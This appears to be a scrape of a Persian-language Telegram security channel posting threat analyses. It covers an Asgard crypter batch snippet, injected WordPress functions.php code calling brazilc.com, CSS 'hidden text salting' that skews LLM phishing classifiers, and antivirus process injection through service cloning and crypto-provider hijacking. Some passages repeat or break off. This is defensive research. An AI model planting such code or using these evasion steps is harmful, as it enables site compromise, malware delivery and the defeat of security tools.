Please open Telegram to view this post
VIEW IN TELEGRAM
آسیبپذیری OpenSSH از طریق ProxyCommand برای اجرای کد از راه دور مورد بهرهبرداری قرار گرفت .
PoC Released
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
تحلیل Asgard
با تحلیل دقیق و مهندسی معکوس Asgard، محققان امنیتی به تکنیکهای پیچیده آن برای دور زدن آنتیویروسها و ابزارهای تحلیلی پی بردهاند. این Crypter که از اواخر سال ۲۰۲۳ در فرومهای زیرزمینی تبلیغ شده، به دلیل قابلیتهای پیشرفته در پنهانسازی و استقرار payloadهای مخرب، توجه مهاجمان سایبری را به خود جلب کرده است. در ادامه، جزئیات فنی و مکانیزم عملکرد این بدافزار به صورت کامل تشریح میشود
این Asgard Protector یک ابزار رمزکننده (Crypter) است که توسط مجرمان سایبری برای پنهانسازی و اجرای بدافزارهای دیگر مانند (RATs) و (Infostealers) استفاده میشود. این ابزار با بستهبندی payloadهای مخرب در قالب یک (installer) به ظاهر سالم، مکانیزمهای دفاعی آنتی ویروسهای سنتی را خنثی کرده و فرآیندهای تحلیل و پاسخ به حوادث را با چالش جدی مواجه میکند.
زنجیره آلودگی و مکانیزم عملکرد (Infection Chain)
عملکرد Asgard Protector چندمرحلهای و لایهلایه است تا شناسایی آن تا حد ممکن دشوار شود.
۱. مرحله اولیه: آرشیو خوداستخراج Nullsoft
بدافزار معمولاً در قالب یک فایل آرشیو خوداستخراج Nullsoft (Nullsoft Self-extracting Archive) توزیع میشود. پس از اجرا، این فایل چندین کامپوننت مخفی را در دایرکتوری موقت سیستم (
%TEMP% ) استخراج (unpack) میکند.۲. تکنیکهای پنهانسازی اولیه
یکی از تکنیکهای هوشمندانه در این مرحله، فریب از طریق پسوند فایل است. اسکریپت batch اصلی که وظیفه هدایت عملیات را بر عهده دارد، با پسوندی غیرمرتبط (مانند تغییر نام یک فایل
.bat به Belgium.pst) ذخیره میشود تا از دید تحلیلگران و سیستمهای امنیتی پنهان بماند. علاوه بر این، محتوای خود اسکریپت نیز به شدت مبهمسازی (Obfuscate) شده است.۳. بازسازی مفسر AutoIt در حافظه
اسکریپت نصبکننده، به جای استفاده از یک فایل اجرایی کامل، قطعات یک مفسر AutoIt را از درون فایلهای آرشیو CAB جاسازیشده استخراج کرده و آن را مستقیماً در حافظه (in-memory) بازسازی (reconstruct) میکند. این رویکرد از رها کردن یک فایل اجرایی کامل بر روی دیسک جلوگیری کرده و در نتیجه، از شناسایی مبتنی بر امضا (signature-based detection) فرار میکند.
۴. رمزگشایی و اجرای Payload نهایی
پس از بازسازی مفسر AutoIt، اسکریپت AutoIt جاسازیشده اجرا میشود که خود شامل لایههای حفاظتی بیشتری است:
* رمزگشایی در حافظه: Payload نهایی (بدافزار اصلی) به صورت رمزنگاریشده با الگوریتم RC4 درون اسکریپت ذخیره شده است و تنها در حافظه رم رمزگشایی میشود.
* فشردهسازی: پس از رمزگشایی، باینری با استفاده از الگوریتم LZNT1 از حالت فشرده خارج میشود.
* تزریق فرآیند (Process Injection): در نهایت، payload مخرب به درون یک فرآیند سیستمی معتبر مانند
explorer.exe تزریق میشود. این کار باعث میشود که فعالیت بدافزار در زیر نقاب یک فرآیند قانونی پنهان شده و شناسایی آن در لیست فرآیندهای در حال اجرا بسیار دشوار گردد.تکنیکهای پیشرفته فرار از تحلیل
این Asgard Protector از مکانیزمهای خاصی برای مقابله با محیطهای تحلیل و سندباکس بهره میبرد:
* شناسایی سندباکس مبتنی بر شبکه: یک تکنیک منحصربهفرد در این بدافزار، ارسال درخواست
ping به یک دامنه که به صورت تصادفی تولید شده است، میباشد. اگر هرگونه پاسخی از این دامنه دریافت شود، بدافزار تشخیص میدهد که در یک محیط شبکه شبیهسازیشده یا مانیتور شده (مانند سندباکس) قرار دارد و بلافاصله اجرای خود را متوقف میکند تا از تحلیل شدن جلوگیری نماید.* اجرای بدون فایل (Fileless Execution): ترکیب تکنیکهای بازسازی در حافظه، رمزگشایی و تزریق فرآیند، به Asgard Protector اجازه میدهد تا بدون نوشتن فایل اجرایی نهایی بر روی دیسک، عملیات خود را تکمیل کند و از دید ابزارهای بازرسی مبتنی بر دیسک پنهان بماند.
مکانیزم پایداری (Persistence)
پس از اجرای موفقیتآمیز، بدافزار بسته به پیکربندی اپراتور، از یکی از روشهای زیر برای اطمینان از اجرای مجدد خود پس از راهاندازی سیستم استفاده میکند:
* تغییر کلیدهای رجیستری Autorun: با افزودن ورودیهای جدید به کلیدهای رجیستری مربوط به اجرای خودکار، بدافزار خود را در چرخه بوت سیستمعامل قرار میدهد.
* ایجاد وظایف زمانبندیشده (Scheduled Tasks): بدافزار یک وظیفه زمانبندیشده جدید در سیستم تعریف میکند تا در فواصل زمانی مشخص یا در رویدادهای خاصی مجدداً اجرا شود.
تحلیل عمیق اسکریپت بازسازی
اسکریپت
.bat مبهمسازیشده از ترکیبی از دستورات خط فرمان ویندوز برای بازسازی باینری مفسر AutoIt استفاده میکند. قطعه کد زیر نمونهای از این فرآیند است:Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
findstr /b /r /c:"MZ" *.dat > offset.txt
for /f "tokens=1" %%A in (offset.txt) do set /A start=%%A
certutil -decode input.cab temp.exe
fsutil file createnew stub.bin %start%
more +%start% input.cab >> stub.bin
تحلیل کد:
1۔
findstr /b /r /c:"MZ" *.dat > offset.txt: این دستور در فایلهای با پسوند .dat (که در واقع آرشیو CAB هستند) به دنبال هدر فایلهای اجرایی ویندوز (MZ) میگردد و آفست (موقعیت شروع) آن را در فایل offset.txt ذخیره میکند.2۔
for /f ... set /A start=%%A: مقدار آفست از فایل متنی خوانده شده و در متغیر start ذخیره میشود.3۔
certutil -decode input.cab temp.exe: این بخش احتمالاً برای decode کردن بخشی از فایل استفاده میشود (اگرچه در این سناریو ممکن است کاربرد دیگری داشته باشد).4۔
fsutil file createnew stub.bin %start%: یک فایل خالی به نام stub.bin با اندازهای برابر با مقدار آفست هدر MZ ایجاد میکند.5۔
more +%start% input.cab >> stub.bin: این دستور هوشمندانه، محتوای فایل input.cab را از نقطه شروع هدر MZ به بعد خوانده و به انتهای فایل stub.bin اضافه میکند. نتیجه این عملیات، بازسازی کامل فایل اجرایی مفسر AutoIt از قطعات جاسازیشده است.این مدل بازسازی (piecemeal assembly) و اجرای چندمرحلهای، توانایی بدافزار را برای فرار از موتورهای آنتیویروس مبتنی بر امضا و ابزارهای تحلیل استاتیک به شدت افزایش میدهد.
@NullError_ir
تحلیل کمپین Malvertising در وردپرس:
مهندسی معکوس تکنیکهای پنهانسازی در functions.php
یک کمپین Malvertising (تبلیغات بدافزاری) پیچیده و در عین حال پنهانکار، وبسایتهای وردپرسی را هدف قرار داده است. این کمپین با تزریق یک قطعه کد PHP به ظاهر بیخطر در فایل
functions.php قالب فعال، کنترل کامل بر روی محتوای front-end وبسایت را به دست گرفته و بازدیدکنندگان را در معرض انواع تهدیدات، از جمله هدایتهای اجباری (Forced Redirects) ، نمایش پاپآپهای مخرب و بدافزارهای drive-by قرار میدهد.فاز اول: شناسایی و نقطه نفوذ
حمله زمانی شناسایی شد که صاحبان وبسایت متوجه بارگذاری اسکریپتهای جاوا اسکریپت مشکوک و ناخواستهای شدند که هرگز توسط آنها نصب نشده بود. بررسی سورس صفحه (View Page Source)، سرنخ اولیه را آشکار ساخت: یک تگ
<noscript> که فایلی را از یک دامنه خارجی و ناشناس بارگذاری میکرد.تحقیقات عمیقتر نشان داد که منشأ این تزریق، یک قطعه کد PHP است که به انتهای فایل
functions.php قالب فعال وردپرس اضافه شده است. این فایل به دلیل نقش کلیدی در تعریف عملکردها و ویژگیهای قالب، یک هدف ایدهآل برای مهاجمان است.بردار اصلی نفوذ در این کمپین، اغلب یکی از موارد زیر است:
* آسیبپذیری در افزونهها یا قالبهای قدیمی: مهاجمان با بهرهبرداری از یک آسیبپذیری شناختهشده، دسترسی لازم برای ویرایش فایلهای قالب را به دست میآورند.
* اعتبارنامههای ضعیف یا سرقتشده: استفاده از رمزهای عبور ضعیف برای حساب مدیریت وردپرس، FTP یا کنترل پنل هاستینگ، مسیری مستقیم برای نفوذ فراهم میکند.
* مجوزهای دسترسی (Permissions) نادرست فایلها: اگر فایل
functions.php دارای مجوز نوشتن (writable) برای پروسس وبسرور باشد، بدافزارها میتوانند به راحتی آن را ویرایش کنند.فاز دوم: کالبدشکافی کد تزریقشده
کد تزریقشده در فایل
functions.php به شکل زیر است. سادگی ظاهری این کد، قدرت پنهانکاری آن را افزایش میدهد:// Injected PHP function in functions.php
function ti_custom_javanoscript() {
$response = wp_remote_post(
'https://brazilc.com/ads.php',
array(
'timeout' => 15,
'body' => array('url' => home_url())
)
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action('wp_head', 'ti_custom_javanoscript');
تحلیل دقیق عملکرد کد:
1۔ add_action('wp_head' , 'ti_custom_javanoscript'); : این خط، قلب مکانیزم حمله است. با استفاده از هوک (hook) وردپرسی
wp_head ، تابع ti_custom_javanoscript در هر بار بارگذاری صفحه (page load) در تمام بخشهای وبسایت، درست در داخل تگ <head> اجرا میشود. این تضمین میکند که کد مخرب قبل از هر اسکریپت دیگری بارگذاری و اجرا شود.2۔ wp_remote_post(...) : این تابع وردپرسی یک درخواست HTTP POST به سرور فرماندهی و کنترل (C\&C) مهاجم به آدرس
hxxps://brazilc[.]com/ads.php ارسال میکند. در بدنه (body) این درخواست، آدرس وبسایت آلوده (home_url()) نیز ارسال میشود که احتمالاً برای ردیابی قربانیان توسط مهاجمان استفاده میشود.3۔ echo wp_remote_retrieve_body($response); : این بخش، حیاتیترین قسمت است. پاسخ دریافت شده از سرور C\&C (که حاوی payload جاوا اسکریپت مخرب است) بدون هیچگونه اعتبارسنجی یا پاکسازی، مستقیماً در خروجی HTML صفحه چاپ (echo) میشود. این تکنیک به مهاجم اجازه میدهد تا به صورت پویا و از راه دور، محتوای مخرب را در لحظه به مرورگر بازدیدکنندگان تزریق کند.
فاز سوم: تحلیل Payload جاوا اسکریپت
پاسخی که از سرور C\&C بازگردانده میشود، یک payload جاوا اسکریپت چندمرحلهای است که یک حمله دومرحلهای (Two-Pronged Attack) را اجرا میکند:
مرحله اول: سیستم توزیع ترافیک
اولین بخش از payload، اسکریپتی را از دامنه
porsasystem[.]com (مشخصاً فایل 6m9x.js) بارگذاری میکند. این دامنه به عنوان یک سیستم توزیع ترافیک (TDS) عمل میکند. یک TDS، سرویسی است که بازدیدکنندگان را بر اساس پارامترهای مختلفی مانند موقعیت جغرافیایی، نوع سیستمعامل، مرورگر و... پروفایل کرده و سپس آنها را به مخربترین یا سودآورترین مقصد بعدی هدایت میکند. این مقصد میتواند شامل موارد زیر باشد:* صفحات فیشینگ
* سایتهای تبلیغاتی مخرب
* کیتهای بهرهبرداری (Exploit Kits)
* دانلود بدافزارهای دیگر (مانند باجافزار یا تروجانهای بانکی)
این اسکریپت مسئول اصلی هدایتهای ناخواسته و نمایش پاپآپهایی است که توسط کاربر گزارش شده است.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
مرحله دوم: تکنیکهای فرار و پنهانسازی
بخش دوم payload، یک تکنیک هوشمندانه برای فرار از شناسایی توسط ابزارهای امنیتی و تحلیلگران به کار میگیرد:
1. ایجاد Iframe مخفی: یک
2. تقلید از Cloudflare: درون این iframe مخفی، کدی تزریق میشود که خود را به عنوان یک اسکریپت تأیید هویت قانونی Cloudflare جا میزند (
3. دور زدن بهینهسازها: در کد اسکریپت از دو مشخصه (attribute) کلیدی استفاده شده است:
*۔ data-cfasync='false': این مشخصه به سرویس بهینهسازی
*۔ async: این مشخصه باعث میشود اسکریپت به صورت غیرهمزمان (asynchronously) بارگذاری شود. این یعنی بارگذاری آن مانع از رندر شدن بقیه محتوای صفحه نمیشود و در نتیجه، تأثیر منفی بر سرعت بارگذاری سایت (از دید کاربر) به حداقل میرسد و حمله کمتر قابل توجه خواهد بود.
شاخصهای نفوذ
* دامنههای مخرب:
۔*
۔*
* مسیر فایل آلوده:
۔*
* قطعه کد مخرب:
* تابع
@NullError_ir
بخش دوم payload، یک تکنیک هوشمندانه برای فرار از شناسایی توسط ابزارهای امنیتی و تحلیلگران به کار میگیرد:
1. ایجاد Iframe مخفی: یک
iframe با ابعاد ۱ در ۱ پیکسل (1x1) به صورت مخفی در صفحه ایجاد میشود. این iframe برای چشم انسان نامرئی است اما به مرورگر اجازه میدهد محتوای خارجی را در پسزمینه بارگذاری کند.2. تقلید از Cloudflare: درون این iframe مخفی، کدی تزریق میشود که خود را به عنوان یک اسکریپت تأیید هویت قانونی Cloudflare جا میزند (
cdn-cgi/challenge-platform/noscripts/jsd/main.js) . از آنجایی که Cloudflare یک سرویس CDN و امنیتی بسیار رایج است، بسیاری از فایروالها، سیستمهای تشخیص نفوذ (IDS) و تحلیلگران امنیتی ممکن است ترافیک مربوط به آن را قانونی تلقی کرده و نادیده بگیرند (whitelisting). این یک روش بسیار مؤثر برای پنهان کردن فعالیت مخرب در میان ترافیک عادی است.3. دور زدن بهینهسازها: در کد اسکریپت از دو مشخصه (attribute) کلیدی استفاده شده است:
*۔ data-cfasync='false': این مشخصه به سرویس بهینهسازی
Rocket Loader کلودفلر دستور میدهد که این اسکریپت را نادیده بگیرد و تغییری در آن ایجاد نکند. این کار از شکسته شدن کد مخرب توسط ابزارهای بهینهسازی جلوگیری میکند.*۔ async: این مشخصه باعث میشود اسکریپت به صورت غیرهمزمان (asynchronously) بارگذاری شود. این یعنی بارگذاری آن مانع از رندر شدن بقیه محتوای صفحه نمیشود و در نتیجه، تأثیر منفی بر سرعت بارگذاری سایت (از دید کاربر) به حداقل میرسد و حمله کمتر قابل توجه خواهد بود.
شاخصهای نفوذ
* دامنههای مخرب:
۔*
brazilc[.]com (سرور C\&C)۔*
porsasystem[.]com (سرور توزیع ترافیک - TDS)* مسیر فایل آلوده:
۔*
wp-content/themes/[نام-قالب-فعال]/functions.php* قطعه کد مخرب:
* تابع
ti_custom_javanoscript() که به هوک wp_head متصل شده است.@NullError_ir
آقای امید میرزائی محقق و سرپرست تیم امنیتی سیسکو تالوس خبر از کشف یک تکنیک فریبنده به نام "Hidden Text Salting" داد.
تحلیل تکنیک "Hidden Text Salting": سوءاستفاده از CSS برای فریب سیستمهای امنیتی ایمیل
بر اساس گزارش ایشان، مهاجمان به طور فزایندهای از یک تکنیک فریبنده به نام "Hidden Text Salting" برای دور زدن راهکارهای امنیتی ایمیل استفاده میکنند. این روش بر پایه سوءاستفاده از ویژگیهای CSS (Cascading Style Sheets) برای تزریق و پنهانسازی محتوای بیربط (که "Salt" یا "نمک" نامیده میشود) در بخشهای مختلف ایمیلها استوار است. هدف اصلی این تکنیک، مختل کردن و فریب دادن سیستمهای تشخیص خودکار، از جمله الگوریتمهای یادگیری ماشین و مدلهای زبانی بزرگ (LLMs) است.
چرا مهاجمان از Hidden Text Salting استفاده میکنند؟
این تکنیک دو هدف اصلی را دنبال میکند:
1. فرار مستقیم از تشخیص (Direct Evasion): مهاجمان با افزودن محتوای بیربط و تصادفی به بدنه ایمیل، امضاها (Signatures) و الگوهای متنی که توسط سیستمهای امنیتی برای شناسایی ایمیلهای مخرب استفاده میشوند را برهم میزنند. این کار تحلیل محتوای ایمیل را برای موتورهای تشخیص دشوارتر میکند.
2. اختلال در فرآیندهای جانبی (Indirect Evasion): این روش میتواند سایر بخشهای خط لوله تحلیل امنیتی را نیز تحت تأثیر قرار دهد. برای مثال، با تزریق کلماتی از یک زبان دیگر (مانند فرانسوی در یک ایمیل انگلیسی)، میتوانند ماژولهای تشخیص زبان را به اشتباه بیندازند و باعث شوند فیلترهای اسپم مبتنی بر زبان، به درستی عمل نکنند.
محتوای "Salt" در کدام بخشهای ایمیل تزریق میشود؟
تحقیقات نشان میدهد که مهاجمان عمدتاً در چهار بخش کلیدی ایمیل محتوای پنهان را جایگذاری میکنند:
1۔ Preheader: متن کوتاهی که در پیشنمایش اینباکس، بلافاصله بعد از عنوان ایمیل نمایش داده میشود. مهاجمان میتوانند در این بخش، متون بیربطی را با استفاده از CSS پنهان کنند تا موتورهای تحلیل را فریب دهند.
2۔ Header: بخشهای بالایی ایمیل که کمتر متداول است اما همچنان به عنوان محلی برای تزریق محتوای پنهان استفاده میشود.
3۔ پیوستها (Attachments): به خصوص در پیوستهای HTML، مهاجمان کاراکترها یا کامنتهای بیربط را بین کدهای مهم (مانند رشتههای Base64) قرار میدهند تا تحلیل استاتیک فایل را پیچیده و فرآیند استخراج URLهای مخرب را دشوار سازند.
4۔ بدنه ایمیل (Email Body): این متداولترین محل برای تزریق Salt است. مهاجمان کاراکترهای پنهان را بین کلمات کلیدی (مانند نام برندها) قرار میدهند تا شناسایی آنها توسط فیلترهای محتوا را مختل کنند.
انواع محتوای مورد استفاده به عنوان Salt
سه نوع محتوای اصلی برای این هدف به کار گرفته میشود:
1. کاراکترها (Characters): شامل کاراکترهای تصادفی که بین کلمات کلیدی قرار میگیرند یا کاراکترهای خاص با عرض صفر (Zero-Width) مانند ZWSP و ZWNJ که بین حروف یک برند (مانند Norton LifeLock) تزریق میشوند. این کاراکترها با چشم غیرمسلح دیده نمیشوند اما توسط پارسرهای ایمیل به عنوان بخشی از رشته متنی شناسایی میشوند.
2. پاراگرافها (Paragraphs): جملات و عبارات کاملاً بیربط (مثلاً به زبان آلمانی در یک ایمیل فیشینگ انگلیسی) که در بدنه ایمیل گنجانده شده و سپس با استفاده از CSS کاملاً پنهان میشوند.
3. کامنتها (Comments): به ویژه در پیوستهای HTML، کامنتهای بیربط زیادی بین کدهای JavaScript یا سایر بخشهای کلیدی قرار داده میشود تا تحلیل استاتیک را دشوار کند.
تکنیکهای رایج CSS برای پنهانسازی محتوا
مهاجمان از سه دسته اصلی ویژگیهای CSS برای نامرئی کردن Salt سوءاستفاده میکنند:
1. ویژگیهای متنی (Text Properties):
*۔
font-size: تنظیم اندازه فونت روی صفر یا یک مقدار بسیار کوچک.*۔
color: تنظیم رنگ متن به همان رنگ پسزمینه (مثلاً سفید روی سفید).2. ویژگیهای نمایش و شفافیت (Visibility and Display Properties):
*۔
opacity: 0: المان را کاملاً شفاف و نامرئی میکند.*۔
display: none: المان را به طور کامل از چیدمان صفحه حذف میکند.*۔
visibility: hidden: المان را پنهان میکند اما فضای آن در چیدمان صفحه حفظ میشود.3. ویژگیهای اندازه و برش (Clipping and Sizing Properties):
*۔
width: 0 یا height: 0: عرض یا ارتفاع کانتینر حاوی متن Salt را صفر قرار میدهند.*۔
overflow: hidden: محتوای اضافی یک کانتینر کوچک را پنهان میکنند. برای مثال، متن بزرگی را در یک دایره با شعاع صفر قرار داده و سرریز آن را مخفی میکنند.شیوع این تکنیک در ایمیلهای اسپم در مقابل ایمیلهای قانونی
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
تحلیلها نشان میدهد که استفاده از تکنیکهای پنهانسازی محتوا با CSS به طور قابل توجهی در ایمیلهای اسپم و تهدیدآمیز شایعتر از ایمیلهای قانونی است. اگرچه در ایمیلهای قانونی نیز از این ویژگیهای CSS برای اهداف مشروع مانند (Responsive Design) یا (Tracking Pixels) استفاده میشود، اما تزریق محتوای متنی بیربط (Salting) تقریباً همیشه در ایمیلهای مخرب مشاهده میشود.
تأثیر Hidden Text Salting بر راهکارهای امنیتی پیشرفته
این تکنیک نه تنها فیلترهای ساده مبتنی بر کلمات کلیدی را دور میزند، بلکه میتواند راهکارهای پیشرفته مبتنی بر هوش مصنوعی و مدلهای زبانی بزرگ (LLMs) را نیز به چالش بکشد.
یک مثال عملی نشان میدهد که چگونه تزریق مقدار کمی متن پنهان و بیربط میتواند خروجی یک LLM (مانند GPT-4o mini) را در تشخیص "قصد" (Intent) و "احساس" (Sentiment) یک ایمیل فیشینگ تغییر دهد. برای مثال، یک ایمیل که "قصد" آن به درستی "خنثی" (Neutral) تشخیص داده شده بود، با افزودن یک متن Salt پنهان، به "مثبت" (Positive) تغییر یافت و از دید سیستم امنیتی مشروع جلوه کرد. به همین ترتیب، "احساس" یک ایمیل که "درخواست اقدام" (Request Action) بود، با این تکنیک به "زمانبندی جلسه" (Schedule Meeting) تغییر پیدا کرد.
این مثالها نشان میدهد که اگر راهکارهای امنیتی مدرن بدون آگاهی از این تکنیکهای متخاصم و بدون اقدامات متقابل مناسب به کار گرفته شوند، تا چه حد میتوانند آسیبپذیر باشند.
@NullError_ir
تأثیر Hidden Text Salting بر راهکارهای امنیتی پیشرفته
این تکنیک نه تنها فیلترهای ساده مبتنی بر کلمات کلیدی را دور میزند، بلکه میتواند راهکارهای پیشرفته مبتنی بر هوش مصنوعی و مدلهای زبانی بزرگ (LLMs) را نیز به چالش بکشد.
یک مثال عملی نشان میدهد که چگونه تزریق مقدار کمی متن پنهان و بیربط میتواند خروجی یک LLM (مانند GPT-4o mini) را در تشخیص "قصد" (Intent) و "احساس" (Sentiment) یک ایمیل فیشینگ تغییر دهد. برای مثال، یک ایمیل که "قصد" آن به درستی "خنثی" (Neutral) تشخیص داده شده بود، با افزودن یک متن Salt پنهان، به "مثبت" (Positive) تغییر یافت و از دید سیستم امنیتی مشروع جلوه کرد. به همین ترتیب، "احساس" یک ایمیل که "درخواست اقدام" (Request Action) بود، با این تکنیک به "زمانبندی جلسه" (Schedule Meeting) تغییر پیدا کرد.
این مثالها نشان میدهد که اگر راهکارهای امنیتی مدرن بدون آگاهی از این تکنیکهای متخاصم و بدون اقدامات متقابل مناسب به کار گرفته شوند، تا چه حد میتوانند آسیبپذیر باشند.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudsek
An Insider Look At The IRGC-linked APT35 Operations: Ep1 & Ep2 | CloudSEK
CloudSEK’s TRIAD team analyzed leaked internal documents from Iran-linked APT35 (Charming Kitten), revealing its structure, tools, and espionage operations. The group—tied to the IRGC—targeted government, legal, energy, and financial sectors across the Middle…
Please open Telegram to view this post
VIEW IN TELEGRAM
تحلیل جامع آسیبپذیری تزریق کد به فرآیندهای آنتیویروس
یک تکنیک پیشرفته و بسیار مهم که توسط یک پژوهشگر امنیت سایبری با نام مستعار "Two Seven One Three" کشف شده است. این تکنیک به مهاجمان اجازه میدهد تا با سوءاستفاده از مکانیزمهای حفاظتی خود نرمافزارهای آنتیویروس، کدهای مخرب را مستقیماً به فرآیندهای اصلی و محافظتشدهی این محصولات امنیتی تزریق کنند. این روش نه تنها به مهاجم امکان میدهد تا از دید سیستمهای امنیتی پنهان بماند، بلکه به او اجازه میدهد تا یک درب پشتی (Backdoor) پایدار در سیستمی ایجاد کند که قاعدتاً باید تحت محافظت شدید باشد.
در ادامه، جزئیات کامل این تکنیک، و اهمیت آن را بررسی میکنیم.
۱. مکانیزمهای دفاعی آنتیویروسها (چرا این حمله مهم است؟)
برای درک عمق این آسیبپذیری، ابتدا باید بدانیم آنتیویروسها چگونه از خودشان در برابر حملات محافظت میکنند:
سطح دسترسی SYSTEM: فرآیندهای آنتیویروس معمولاً با بالاترین سطح دسترسی در ویندوز (SYSTEM) اجرا میشوند تا بتوانند بر تمام فعالیتهای سیستم نظارت کرده و تهدیدات را خنثی کنند.
محافظت از فرآیند (Process Protection): آنتیویروسها از مکانیزمهایی مانند
Protected Process Light (PPL) در ویندوز استفاده میکنند. این ویژگی اجازه نمیدهد که حتی فرآیندهایی با دسترسی مدیر (Administrator) بتوانند فرآیندهای محافظتشده را دستکاری، متوقف یا به آنها کد تزریق کنند. به همین دلیل این فرآیندها "unkillable" یا غیرقابل توقف نامیده میشوند.بررسی یکپارچگی کد (Code Integrity Checks): آنتیویروسها بهطور مداوم بررسی میکنند که ماژولها و کتابخانههایی (DLL) که در فرآیندهایشان بارگذاری میشوند، دارای امضای دیجیتال معتبر باشند و دستکاری نشده باشند.
درایورهای سطح کرنل (Kernel-Level Drivers): درایورهای آنتیویروس در سطح هسته سیستمعامل (Kernel) فعالیت میکنند و هرگونه تلاش برای تغییر در مکانیزمهای شناسایی یا دستکاری فرآیندهای محافظتشده را مسدود میکنند.
حفاظت از فایلها و رجیستری: آنتیویروسها از دسترسی و نوشتن در پوشه نصب خود و کلیدهای رجیستری مربوط به خودشان بهشدت محافظت میکنند تا از غیرفعال شدن یا دستکاری آنها جلوگیری شود.
این حمله دقیقاً این لایههای دفاعی را هدف قرار میدهد و آنها را دور میزند.
۲. تشریح تکنیک حمله: شبیهسازی سرویس و تزریق کد
این تکنیک در دو مرحله اصلی انجام میشود:
مرحله اول: شبیهسازی سرویس محافظتشده (Service Cloning)
مهاجم بهجای حمله مستقیم به سرویس اصلی و در حال اجرای آنتیویروس (که تقریباً غیرممکن است)، یک کپی یا "کلون" از آن سرویس ایجاد میکند.
1. صادر کردن کلید رجیستری: مهاجم کلید رجیستری مربوط به یکی از سرویسهای محافظتشده آنتیویروس (مثلاً
BDProtSrv در Bitdefender) را پیدا کرده و آن را Export میکند. این کلید حاوی تمام تنظیمات و پیکربندیهای آن سرویس است.2. وارد کردن کلید با نام جدید: سپس مهاجم همان کلید رجیستری را با یک نام جدید Import میکند. با این کار، یک سرویس کاملاً جدید اما با همان مشخصات و سطح حفاظت سرویس اصلی در سیستم تعریف میشود.
3. بارگذاری سرویس کلونشده: پس از راهاندازی مجدد سیستم (Reboot)، سرویسمنیجر ویندوز (
Services.exe) این سرویس جدید را شناسایی کرده و آن را در حافظه پنهان خود بارگذاری میکند. حالا مهاجم یک سرویس کلونشده دارد که مانند سرویس اصلی، محافظتشده (PPL) است و با دسترسی SYSTEM اجرا میشود.مرحله دوم: تزریق کد از طریق ربودن ارائهدهنده رمزنگاری (Hijacking Cryptographic Provider)
از آنجایی که تزریق مستقیم کد به فرآیند محافظتشده کلونشده نیز مسدود است، مهاجم از یک مسیر هوشمندانه و غیرمستقیم استفاده میکند:
1۔ API رمزنگاری ویندوز: فرآیندهای آنتیویروس برای عملیات مختلفی مانند بررسی امضای دیجیتال و رمزنگاری، از توابع API رمزنگاری ویندوز (Windows Cryptography API) استفاده میکنند. این API برای یافتن ارائهدهندگان خدمات رمزنگاری (Providers) به یک مسیر مشخص در رجیستری مراجعه میکند.
2. تغییر مسیر در رجیستری: مهاجم کلید رجیستری زیر را دستکاری میکند:
HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Providerاو مسیر پیشفرض را به مسیر فایل DLL مخرب خود تغییر میدهد.
3. بارگذاری DLL مخرب: هنگامی که سرویس کلونشده آنتیویروس اجرا میشود، برای انجام عملیات رمزنگاری، به مسیر دستکاریشده در رجیستری مراجعه میکند و ناآگاهانه، DLL مخرب مهاجم را به جای کتابخانه اصلی و معتبر ویندوز، در فضای حافظه خود بارگذاری (Load) میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
4. دور زدن بررسی امضای دیجیتال: برای اینکه آنتیویروس متوجه نشود که یک DLL غیرمعتبر بارگذاری شده است، مهاجم امضای دیجیتال یک برنامه معتبر ویندوز را کپی کرده و DLL مخرب خود را با آن امضا میکند. برای این کار از ابزارهایی مانند
با این روش، کد مخرب مهاجم اکنون در بستر یک فرآیند کاملاً محافظتشده و با بالاترین سطح دسترسی در حال اجرا است. این کد میتواند فایلهایی را در پوشه نصب آنتیویروس بنویسد (کاری که در حالت عادی غیرممکن است)، یک درب پشتی ایجاد کند، یا سایر بدافزارها را بدون شناسایی شدن اجرا کند.
۳. ابزار IAmAntimalware: اتوماسیون فرآیند حمله
پژوهشگر این تکنیک، برای اثبات عملی بودن آن و خودکارسازی مراحل، ابزاری متنباز به نام
* شبیهسازی سرویس مورد نظر.
* تغییر کلید رجیستری مربوط به ارائهدهنده رمزنگاری یا اشیاء COM.
* وارد کردن گواهی دیجیتال کلونشده برای دور زدن بررسی امضا.
* راهاندازی سرویس کلونشده و اجرای کد مخرب.
این ابزار روی محصولات امنیتی معروفی مانند Bitdefender ، Trend Micro و Avast با موفقیت آزمایش شده است.
. پیامدها و خطرات
اهمیت این تکنیک در این است که از نقاط قوت آنتیویروس علیه خودش استفاده میکند:
ایجاد درب پشتی پایدار: بدافزار میتواند خود را در محیط آنتیویروس جای دهد و با هر بار اجرای سیستم، همراه با آنتیویروس اجرا شود و شناسایی آن بسیار دشوار خواهد بود.
غیرفعالسازی پنهانی: کد تزریقشده میتواند بهتدریج و بهصورت پنهانی، قابلیتهای شناسایی آنتیویروس را غیرفعال کند.
اجرای دستورات با بالاترین سطح دسترسی: مهاجم میتواند از این طریق به کل سیستم با دسترسی SYSTEM مسلط شود.
CertClone استفاده میشود.با این روش، کد مخرب مهاجم اکنون در بستر یک فرآیند کاملاً محافظتشده و با بالاترین سطح دسترسی در حال اجرا است. این کد میتواند فایلهایی را در پوشه نصب آنتیویروس بنویسد (کاری که در حالت عادی غیرممکن است)، یک درب پشتی ایجاد کند، یا سایر بدافزارها را بدون شناسایی شدن اجرا کند.
۳. ابزار IAmAntimalware: اتوماسیون فرآیند حمله
پژوهشگر این تکنیک، برای اثبات عملی بودن آن و خودکارسازی مراحل، ابزاری متنباز به نام
IAmAntimalware را در گیتهاب منتشر کرده است. این ابزار با دریافت چند پارامتر خط فرمان، تمام مراحل زیر را بهصورت خودکار انجام میدهد:* شبیهسازی سرویس مورد نظر.
* تغییر کلید رجیستری مربوط به ارائهدهنده رمزنگاری یا اشیاء COM.
* وارد کردن گواهی دیجیتال کلونشده برای دور زدن بررسی امضا.
* راهاندازی سرویس کلونشده و اجرای کد مخرب.
این ابزار روی محصولات امنیتی معروفی مانند Bitdefender ، Trend Micro و Avast با موفقیت آزمایش شده است.
. پیامدها و خطرات
اهمیت این تکنیک در این است که از نقاط قوت آنتیویروس علیه خودش استفاده میکند:
